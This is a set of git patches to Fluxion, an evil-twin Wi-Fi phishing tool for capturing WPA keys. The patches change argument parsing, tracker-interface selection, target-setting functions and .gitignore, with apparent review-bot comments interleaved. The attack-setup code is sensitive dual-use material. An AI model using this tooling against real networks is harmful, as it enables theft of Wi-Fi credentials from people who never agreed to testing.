@@ -1507,6 +1507,13 @@ fluxion_prep_attack() { if [ ! -x "$path/attack.sh" ]; then return 1; fi if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi + # Load attack parameters if any exist. + if [ "$AttackCLIArguments" ]; then + eval set -- "$AttackCLIArguments" + # Remove them after loading them once. + unset AttackCLIArguments + fi + # Load attack and its corresponding language file. # Load english by default to overwrite globals that ARE defined. source "$path/language/en.sh" @@ -1520,7 +1527,7 @@ fluxion_prep_attack() { if ! fluxion_set_attack_target; then return 3; fi fi - if ! prep_attack "$@"; then return 4; fi + if ! prep_attack; then return 4; fi } fluxion_run_attack() { @@ -1554,16 +1561,13 @@ fluxion_run_attack() { # ================= < Argument Executables > ================= # # ============================================================ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. - -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; esac shift # Shift new parameters done -shift # Remove "--" to prepare for attacks to read parameters. - # ============================================================ # # ===================== < FLUXION Loop > ===================== # From b980ea21dbaa64ef467fd17344d6eaa17488ef43 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 02:54:55 -0600 Subject: [PATCH 33/45] Fixed clean SSID bug & minor auto-mode bug. The clean SSID wasn't being set when then -e flag was passed. The auto-mode wasn't auto-checking automatically found hash files. --- fluxion | 58 ++++++++++++++++++++++++++++++++++----------------------- 1 file changed, 35 insertions(+), 23 deletions(-) diff --git a/fluxion b/fluxion index b1e5014..c7bdd21 100755 --- a/fluxion +++ b/fluxion 
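Review bot: In fluxion_prep_attack (hunk -1507,6), the positional parameters are replaced only when `AttackCLIArguments` is non-empty, yet attack.sh parses `$1` onward every time it is sourced and `prep_attack` no longer receives `"$@"`. On a second call, or when no attack options were given, the attack script sees whatever arguments fluxion_prep_attack itself was called with (its callers are outside the hunk). Adding `else set --` to the new `if` makes that case explicit. The `eval` is only as safe as the string built at the top of the script, so a comment stating that `AttackCLIArguments` must be getopt-quoted output would help the next maintainer.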
@@ -107,7 +107,11 @@ while [ "$1" != "" -a "$1" != "--" ]; do -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; - -e|--essid) FluxionTargetSSID=$2; shift;; + -e|--essid) FluxionTargetSSID=$2; + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + shift;; -c|--channel) FluxionTargetChannel=$2; shift;; -l|--language) FluxionLanguage=$2; shift;; -a|--attack) FluxionAttack=$2; shift;; @@ -1276,6 +1280,9 @@ fluxion_hash_verify() { fluxion_hash_unset_path() { if [ ! "$FluxionHashPath" ]; then return 1; fi FluxionHashPath="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Parameters: [channel [encryption [maker]]] 
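Review bot: In the `-e|--essid` arm (hunk -107,7), the clean SSID is produced by a deny-list of five characters, so everything else in the SSID (quotes, `$`, `*`, newlines, a leading `-`) passes through unchanged. SSIDs are chosen by whoever operates the network, and the variable name suggests the value ends up in file names (its uses are outside the hunk), so an allow-list is the safer default, e.g. `sed -r 's/[^A-Za-z0-9_-]+/_/g'`. `echo "$FluxionTargetSSID"` also misparses values such as `-n` or `-e`; `printf '%s\n' "$FluxionTargetSSID"` avoids that. If the same expression exists elsewhere in the script, both copies should move into one helper so they cannot diverge.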
@@ -1289,35 +1296,40 @@ fluxion_hash_set_path() { # If we've got a default path, check if a hash exists. # If one exists, ask users if they'd like to use it. if [ "$hashPath" -a -f "$hashPath" -a -s "$hashPath" ]; then - local choices=( \ - "$FLUXIONUseFoundHashOption" \ - "$FLUXIONSpecifyHashPathOption" \ - "$FLUXIONHashSourceRescanOption" \ - "$FLUXIONGeneralBackOption" \ - ) + if [ "$FLUXIONAuto" ]; then + FluxionHashPath=$hashPath + return + else + local choices=( \ + "$FLUXIONUseFoundHashOption" \ + "$FLUXIONSpecifyHashPathOption" \ + "$FLUXIONHashSourceRescanOption" \ + "$FLUXIONGeneralBackOption" \ + ) - fluxion_header + fluxion_header - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" - echo + echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" + echo -e "$FLUXIONVLine $FLUXIONUseFoundHashQuery" + echo - io_query_choice "" choices[@] + io_query_choice "" choices[@] - echo + echo - case "$IOQueryChoice" in - "$FLUXIONUseFoundHashOption") - FluxionHashPath=$hashPath - return ;; + case "$IOQueryChoice" in + "$FLUXIONUseFoundHashOption") + FluxionHashPath=$hashPath + return ;; - "$FLUXIONHashSourceRescanOption") - fluxion_hash_set_path "$@" - return $? ;; + "$FLUXIONHashSourceRescanOption") + fluxion_hash_set_path "$@" + return $? ;; - "$FLUXIONGeneralBackOption") - return -1 ;; - esac + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi fi while [ ! "$FluxionHashPath" ]; do From 0e6b638d8628125e7ea24a74607350d01ebe895a Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 20 Jan 2018 10:17:44 +0100 Subject: [PATCH 34/45] Create arguments.md --- misc/arguments.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 misc/arguments.md diff --git a/misc/arguments.md b/misc/arguments.md new file mode 100644 index 0000000..5469cf4 --- /dev/null +++ b/misc/arguments.md 
@@ -0,0 +1,19 @@ +## Arguments table + +| Arguments | Describtion | +| ------------- | ------------- | +| -a | Give a Attack | +| -e | Give a certain essid | +| -b | Give a certain bssid | +| -- | Maker is required | +| -a | Access point interface | +| -j | Jamming interface | +| -x | Use xterm instead of tmux | +| -v | Print version number | +| -d | Run fluxion in debug mode | +| -k | Kill wireless connection if it is connected | +| -m | Run fluxion in manual mode instead of auto | +| -l | Language | + +## Samples +`./fluxion -a [ATTACK] -e [ESSID] -b [BSSID] -c [CHANNEL] -- -a [AP INTERFACE] -j [JAMMING INTERFACE]` From 26ecea2a5113045f481e10fb94c95cb9c5f43959 Mon Sep 17 00:00:00 2001 From: deltax Date: Sat, 20 Jan 2018 11:57:29 +0100 Subject: [PATCH 35/45] Rename arguments.md to README.md --- misc/{arguments.md => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename misc/{arguments.md => README.md} (100%) diff --git a/misc/arguments.md b/misc/README.md similarity index 100% rename from misc/arguments.md rename to misc/README.md From 488a8501622dd7dcecc75ef5aa644a68f33af9d7 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Sat, 20 Jan 2018 16:06:45 -0600 Subject: [PATCH 36/45] Added tracker selection, and other minor bug fixes. Added tracker selection to fluxion, querying an interface for tracking. Fixed a bug where auto-mode was activating on manual mode (no flags). Added skip option to the generic interface selection function. Reidentified some targetting subroutines following the convention. Corrected an outdated language global. Added the general skip option. --- attacks/Captive Portal/attack.sh | 9 + attacks/Captive Portal/language/en.sh | 2 +- fluxion | 271 ++++++++++++++++---------- language/en.sh | 3 + 4 files changed, 183 insertions(+), 102 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index c76fb20..1696c66 100755 --- a/attacks/Captive Portal/attack.sh 
+++ b/attacks/Captive Portal/attack.sh @@ -1201,6 +1201,15 @@ attack_targetting_interfaces() { done } +attack_tracking_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done + echo "" # This enables the Skip option. +} + unprep_attack() { CaptivePortalState="Not Ready" diff --git a/attacks/Captive Portal/language/en.sh b/attacks/Captive Portal/language/en.sh index 46d854e..fd480a6 100755 --- a/attacks/Captive Portal/language/en.sh +++ b/attacks/Captive Portal/language/en.sh @@ -3,7 +3,7 @@ # description: Creates an "evil twin" access point. CaptivePortalJammerInterfaceQuery="Select an interface for jamming." -CaptivePortalAPInterfaceQuery="Select an interface for the access point." +CaptivePortalAccessPointInterfaceQuery="Select an interface for the access point." CaptivePortalAPServiceQuery="Select an access point service" CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" diff --git a/fluxion b/fluxion index c7bdd21..57c10cf 100755 --- a/fluxion +++ b/fluxion @@ -96,7 +96,7 @@ declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +[ "$1" != "" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in @@ -865,7 +865,7 @@ fluxion_allocate_interface() { # Reserve interfaces # as the key for the global FluxionInterfaces hash/map/dictionary. } -# Parameters: +# Parameters: [] # Note: The interfaces lambda must print an interface per line. # ------------------------------------------------------------ # # Return -1: Go back 
@@ -880,30 +880,35 @@ fluxion_get_interface() { fi while true; do - local interfacesAvailable - readarray -t interfacesAvailable < <($1) + local candidateInterfaces + readarray -t candidateInterfaces < <($1) + local interfacesAvailable=() local interfacesAvailableInfo=() local interfacesAvailableColor=() local interfacesAvailableState=() # Gather information from all available interfaces. - local interfacesAvailableCount=${#interfacesAvailable[@]} + local candidateInterface + for candidateInterface in "${candidateInterfaces[@]}"; do + if [ ! "$candidateInterface" ]; then + local skipOption=1 + continue + fi - local i - for (( i = 0; i < interfacesAvailableCount; i++ )); do - local interfaceCandidate=${interfacesAvailable[i]} - - interface_chipset "$interfaceCandidate" + interface_chipset "$candidateInterface" interfacesAvailableInfo+=("$InterfaceChipset") # If it has already been allocated, we can use it at will. - local interfaceCandidateAlt=${FluxionInterfaces["$interfaceCandidate"]} - if [ "$interfaceCandidateAlt" ]; then - interfacesAvailable[$i]=$interfaceCandidateAlt + local candidateInterfaceAlt=${FluxionInterfaces["$candidateInterface"]} + if [ "$candidateInterfaceAlt" ]; then + interfacesAvailable+=("$candidateInterfaceAlt") + interfacesAvailableColor+=("$CGrn") interfacesAvailableState+=("[*]") else - interface_state "$interfaceCandidate" + interfacesAvailable+=("$candidateInterface") + + interface_state "$candidateInterface" if [ "$InterfaceState" = "up" ]; then interfacesAvailableColor+=("$CPrp") 
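Review bot: `local skipOption=1` is only executed inside the `for` loop when a blank candidate is seen, so it is never reset at the top of the enclosing `while true` loop. After a Repeat, a value from the previous pass survives even if the lambda no longer prints the blank line. I would initialise it next to the other per-pass arrays with `local skipOption=""`. The following hunk then tests it unquoted in `if [ $skipOption ]`, which should be `if [ "$skipOption" ]`. `fluxion_get_interface` starts and ends outside this hunk.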
@@ -917,20 +922,26 @@ fluxion_get_interface() { # If only one interface exists and it's not unavailable, choose it. if [ "${#interfacesAvailable[@]}" -eq 1 -a \ - "${interfacesAvailableState[0]}" != "[-]" ]; then + "${interfacesAvailableState[0]}" != "[-]" -a \ + "$skipOption" == "" ]; then FluxionInterfaceSelected="${interfacesAvailable[0]}" FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" break else - interfacesAvailable+=( \ - "$FLUXIONGeneralRepeatOption" \ - "$FLUXIONGeneralBackOption" \ + if [ $skipOption ]; then + interfacesAvailable+=("$FLUXIONGeneralSkipOption") + interfacesAvailableColor+=("$CClr") + fi + + interfacesAvailable+=( + "$FLUXIONGeneralRepeatOption" + "$FLUXIONGeneralBackOption" ) - interfacesAvailableColor+=( \ - "$CClr" \ - "$CClr" \ + interfacesAvailableColor+=( + "$CClr" + "$CClr" ) format_apply_autosize \ @@ -944,6 +955,11 @@ fluxion_get_interface() { echo case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralSkipOption") + FluxionInterfaceSelected="" + FluxionInterfaceSelectedState="" + FluxionInterfaceSelectedInfo="" + return 0;; "$FLUXIONGeneralRepeatOption") continue;; "$FLUXIONGeneralBackOption") return -1;; *) 
@@ -1201,6 +1217,121 @@ fluxion_target_show() { echo } +fluxion_target_unset_tracker() { + if [ ! "$FluxionTargetTrackerInterface" ]; then return 1; fi + + FluxionTargetTrackerInterface="" +} + +fluxion_target_set_tracker() { + if [ "$FluxionTargetTrackerInterface" ]; then return 0; fi + + # Check if attack provides tracking interfaces, get & set one. + if ! type -t attack_tracking_interfaces &> /dev/null; then + return 1 + fi + + if [ "$FluxionTargetTrackerInterface" == "" -a ! "$FLUXIONAuto" ]; then + echo "Running get interface (tracker)." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_tracking_interfaces \ + "$FLUXIONTargetTrackerInterfaceQuery"; then + echo "Failed to get tracker interface!" > $FLUXIONOutputDevice + return 2 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$FluxionTargetTrackerInterface + fi + + # If user skipped a tracker interface, move on. + if [ ! "$selectedInterface" ]; then + fluxion_target_unset_tracker + return 0 + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate tracking interface!" > $FLUXIONOutputDevice + return 3 + fi + + echo "Successfully got tracker interface." > $FLUXIONOutputDevice + FluxionTargetTrackerInterface=${FluxionInterfaces[$selectedInterface]} +} + +fluxion_target_unset() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_target_set() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + # If we've got a candidate target, ask user if we'll keep targetting it. 
+ + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + # =================== < Hash Subroutines > =================== # # Parameters: [channel [encryption [maker]]] @@ -1228,12 +1359,7 @@ fluxion_hash_verify() { echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" echo - fluxion_target_show \ - "$hashESSID" \ - "$hashEncryption" \ - "$hashChannel" \ - "$hashBSSID" \ - "$hashMaker" + fluxion_target_show local choices=( \ "$FLUXIONHashVerificationMethodPyritOption" \ 
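Review bot: In `fluxion_target_set_tracker` the `else` branch can only be reached with `FluxionTargetTrackerInterface` empty, because the function already returned on its first line when it was set; `selectedInterface` is therefore always empty there and auto mode always ends in `fluxion_target_unset_tracker`. The test `"$FluxionTargetTrackerInterface" == ""` is redundant for the same reason, so the condition can be reduced to `if [ ! "$FLUXIONAuto" ]; then` with a comment that auto mode skips tracking. The log redirections `> $FLUXIONOutputDevice` and the call `fluxion_allocate_interface $selectedInterface` are unquoted; `> "$FLUXIONOutputDevice"` avoids an ambiguous-redirect error if the variable is ever empty. In `fluxion_target_set`, `read choice` should be `read -r choice`, and `local choice` belongs before the `while` loop whose condition first reads it.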
@@ -1431,78 +1557,6 @@ fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } -fluxion_unset_attack_target() { - FluxionTargetMAC="" - FluxionTargetSSID="" - FluxionTargetChannel="" - - FluxionTargetEncryption="" - - FluxionTargetMakerID="" - FluxionTargetMaker="" - - FluxionTargetSSIDClean="" - - FluxionTargetRogueMAC="" - - return 1 # To trigger undo-chain. -} - -fluxion_set_attack_target() { - # Check if attack is targetted & set the attack target if so. - if ! type -t attack_targetting_interfaces &> /dev/null; then - return 1 - fi - - if [ \ - "$FluxionTargetSSID" -a \ - "$FluxionTargetMAC" -a \ - "$FluxionTargetChannel" \ - ]; then - fluxion_header - fluxion_target_show - echo - echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" - - # TODO: This doesn't translate choices to the selected language. - while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do - echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " - local choice - read choice - if [ ! "$choice" ]; then break; fi - done - - echo -ne "\n\n" - - if [ "${choice,,}" != "n" ]; then - return 0 - fi - elif [ \ - "$FluxionTargetSSID" -o \ - "$FluxionTargetMAC" -o \ - "$FluxionTargetChannel" \ - ]; then - # TODO: Survey environment here to autofill missing fields. - # In other words, if a user gives incomplete information, scan - # the environment based on either the ESSID or BSSID, & autofill. - echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" - sleep 3 - fi - - if ! fluxion_get_interface attack_targetting_interfaces; then - return 2 - fi - - if ! fluxion_allocate_interface $FluxionInterfaceSelected; then - return 3 - fi - - if ! fluxion_get_target \ - ${FluxionInterfaces[$FluxionInterfaceSelected]}; then - return 4 - fi -} - fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack 
@@ -1536,10 +1590,25 @@ fluxion_prep_attack() { # Check if attack is targetted & set the attack target if so. if type -t attack_targetting_interfaces &> /dev/null; then - if ! fluxion_set_attack_target; then return 3; fi + if ! fluxion_target_set; then return 3; fi fi - if ! prep_attack; then return 4; fi + # Check if attack provides tracking interfaces, get & set one. + if type -t attack_tracking_interfaces &> /dev/null; then + if ! fluxion_target_set_tracker; then return 4; fi + # TODO: Remove this below after we've implemented tracking. + # I suggest we use airodump-ng, periodically checking by BSSID. + if [ "$FluxionTargetTrackerInterface" ]; then + fluxion_header + echo -e "$FLUXIONVLine Hold the hell up... that hasn't been implemented yet." + sleep 4 + echo -e "$FLUXIONVLine We'll pretend you selected \"$FLUXIONGeneralSkipOption\"$CClr." + sleep 4 + FluxionTargetTrackerInterface="" + fi + fi + + if ! prep_attack; then return 5; fi } fluxion_run_attack() { diff --git a/language/en.sh b/language/en.sh index 7a4286b..8774b2f 100755 --- a/language/en.sh +++ b/language/en.sh @@ -8,6 +8,8 @@ FLUXIONDeallocatingInterfaceNotice="Deallocating reserved interface $CGrn\"\$int FLUXIONReidentifyingInterface="Renaming interface." FLUXIONUnblockingWINotice="Unblocking all wireless interfaces." +FLUXIONTargetTrackerInterfaceQuery="Select an interface for target tracking." + #FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." 
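Review bot: The placeholder block clears `FluxionTargetTrackerInterface` after `fluxion_target_set_tracker` has already called `fluxion_allocate_interface` on the selection, so the interface stays reserved in `FluxionInterfaces` although nothing will use it. Until tracking exists I would not prompt at all, or release the interface before clearing the variable (the deallocation helper is not visible here). The two `echo -e` messages are hard-coded English, unlike the other prompts, which come from the language files. The failure status of `prep_attack` also moves from 4 to 5, so any caller that matched on 4 needs checking. `fluxion_prep_attack` starts outside the hunk.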
@@ -70,6 +72,7 @@ FLUXIONAttackQuery="Select a wireless attack for the access point" FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" FLUXIONGeneralExitOption="${CRed}Exit" FLUXIONGeneralRepeatOption="${CRed}Repeat" From bb824a0934f30410ef17837f6e89a7532372804d Mon Sep 17 00:00:00 2001 From: William Todt Date: Thu, 25 Jan 2018 21:29:04 +0100 Subject: [PATCH 37/45] Minor code changes and tweaks --- .editorconfig | 4 +- .gitignore | 209 +++++++++++++++++++++++++++++++++-------- .gitmodules | 3 +- .project | 2 +- README.md | 7 -- fluxion | 9 +- language/cs.sh | 1 + language/de.sh | 1 + language/el.sh | 1 + language/en.sh | 1 + language/es.sh | 1 + language/fr.sh | 1 + language/it.sh | 1 + language/pl.sh | 1 + language/pt-br.sh | 1 + language/ro.sh | 1 + language/sk.sh | 1 + language/sl.sh | 1 + language/tk.sh | 1 + language/zh.sh | 1 + scripts/debug.sh | 6 +- scripts/diagnostics.sh | 81 ++++++++++------ scripts/router.sh | 70 -------------- 23 files changed, 249 insertions(+), 156 deletions(-) delete mode 100755 scripts/router.sh diff --git a/.editorconfig b/.editorconfig index c68852e..0b79d02 100644 --- a/.editorconfig +++ b/.editorconfig @@ -7,12 +7,12 @@ max_line_length=120 [*.sh] indent_style = tab -indent_size = 2 +indent_size = 4 charset = utf-8 trim_trailing_whitespace = true [*.py] -indent_size=2 +indent_size = 4 [*.md] trim_trailing_whitespace = false diff --git a/.gitignore b/.gitignore index f2500c2..57c0236 100644 --- a/.gitignore +++ b/.gitignore 
@@ -1,38 +1,173 @@ + +# Custom files *~ *.swp *.swo *.cap *.log +*.conf +*.lock +*.save *.backup -BullyOutput.txt -/preferences.sh* +# Compiled Object files +*.slo +*.lo +*.o +*.obj -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* +# Precompiled Headers +*.gch +*.pch -# KDE directory preferences -.directory +# Compiled Dynamic libraries +*.so +*.dylib +*.dll -# Linux trash folder which might appear on any partition or disk -.Trash-* +# Fortran module files +*.mod +*.smod -# .nfs files are created when an open file is removed but is still being accessed -.nfs* +# Compiled Static libraries +*.lai +*.la +*.a +*.lib -# Cache files for Sublime Text +# Executables +*.exe +*.out +*.app + +### Calabash ### +# Calabash / Cucumber +rerun/ +reports/ +screenshots/ +screenshot*.png +test-servers/ + +# bundler +.bundle +vendor + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. 
+*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule.* + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + +### SublimeText ### +# cache files for sublime text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache -# Workspace files are user-specific +# workspace files are user-specific *.sublime-workspace -# Project files should be checked into the repository, unless a significant -# proportion of contributors will probably not be using Sublime Text +# project files should be checked into the repository, unless a significant +# proportion of contributors will probably not be using SublimeText # *.sublime-project -# SFTP configuration file +# sftp configuration file sftp-config.json # Package control specific files 
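Review bot: The Python packaging block adds an unanchored `lib/` pattern (next to `build/`, `dist/` and `var/`), and that pattern matches this repository's own `lib` directory, which holds `InterfaceUtils.sh`. Files already tracked stay tracked, but any new library script added under `lib/` will be silently skipped by `git add`. I would drop the Python packaging section or re-include the directory with `!/lib/` after it. The same hunk removes the `BullyOutput.txt` and `/preferences.sh*` entries; `*.conf` covers the renamed preferences file, but it is worth confirming that the tool output file can no longer land in the work tree, since it would now be committable.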
@@ -51,30 +186,22 @@ bh_unicode_properties.cache # https://packagecontrol.io/packages/sublime-github GitHub.sublime-settings -# General -*.DS_Store -.AppleDouble -.LSOverride +### Vim ### +# swap +.sw[a-p] +.*.sw[a-p] +# session +Session.vim +# temporary +.netrwhist +*~ +# auto-generated tag files +tags -# Icon must end with two \r -Icon - - -# Thumbnails -._* - -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent - -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +.history \ No newline at end of file diff --git a/.gitmodules b/.gitmodules index da31889..b7adfeb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,3 @@ [submodule "attacks/Captive Portal/sites"] path = attacks/Captive Portal/sites - #url = git@github.com:FluxionNetwork/sites.git - url = https://github.com/FluxionNetwork/sites + url = https://github.com/FluxionNetwork/sites diff --git a/.project b/.project index a4206b7..6ab8b19 100644 --- a/.project +++ b/.project @@ -1,6 +1,6 @@ - fluxion + Fluxion diff --git a/README.md b/README.md index 128c62d..bbc77e7 100644 --- a/README.md +++ b/README.md 
@@ -3,13 +3,6 @@ # Fluxion is the future of MITM WPA attacks Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phising) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://github.com/FluxionNetwork/fluxion/wiki/FAQ) before requesting issues. -## Router login page -Share your own router page with a simple script -``` -cd scripts -sudo sh router.sh -``` - ## Installation Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
diff --git a/fluxion b/fluxion index 57c10cf..13180a5 100755 --- a/fluxion +++ b/fluxion @@ -14,7 +14,7 @@ declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) declare -r FLUXIONWorkspacePath="/tmp/fluxspace" # Path to FLUXION's preferences file, to be loaded afterward. -declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.sh" +declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.conf" # Constants denoting the reference noise floor & ceiling levels. # These are used by the the wireless network scanner visualizer. @@ -22,7 +22,7 @@ declare -r FLUXIONNoiseFloor=-90 declare -r FLUXIONNoiseCeiling=-60 declare -r FLUXIONVersion=4 -declare -r FLUXIONRevision=0 +declare -r FLUXIONRevision=1 # ============================================================ # @@ -1553,6 +1553,11 @@ fluxion_set_attack() { if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then return -1 fi + + if [ "${IOQueryFormatFields[1]}" = "$FluxionRestartOption" ]; then + return 2 + fi + FluxionAttack=${IOQueryFormatFields[0]} } diff --git a/language/cs.sh b/language/cs.sh index 2928752..97a5bab 100755 --- a/language/cs.sh +++ b/language/cs.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Absolute path" FLUXIONScannerChannelQuery="Vyberte kanál" FLUXIONScannerChannelOptionAll="Všechny kanály" FLUXIONScannerChannelOptionSpecific="Specifický kanál(y)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Jeden kanál" FLUXIONScannerChannelMiltipleTip="Více kanálů" diff --git a/language/de.sh b/language/de.sh index 660b930..f8267c9 100755 --- a/language/de.sh +++ b/language/de.sh 
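Review bot: Pointing `FLUXIONPreferencesFile` at `preferences.conf` changes only the name; the comment still says the file is "loaded afterward", and if that load is a `source` (not visible in this hunk) the file is executed as shell code by a script that refuses to run as anything but root. A `.conf` suffix invites treating it as inert data, so I would add a comment such as `# NOTE: sourced as bash; must be owned and writable by root only` and check ownership before loading. An existing `preferences.sh` is also no longer read, so saved settings are dropped without notice.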
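Review bot: `FluxionRestartOption` breaks the `FLUXION…Option` naming used by the neighbouring globals (`FLUXIONGeneralBackOption`, `FLUXIONGeneralSkipOption`), and the new `return 2` in `fluxion_set_attack` is not documented next to the existing `return -1`. I would name it `FLUXIONGeneralRestartOption` and add a comment `# Return 2: restart requested`. No visible hunk adds the option to the menu the user chooses from, so the comparison may never match. In the `language/pl.sh` hunk the added line reads `FluxionRestartOption="Restart"s`; the stray `s` after the closing quote becomes part of the value. `fluxion_set_attack` starts outside the hunk.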
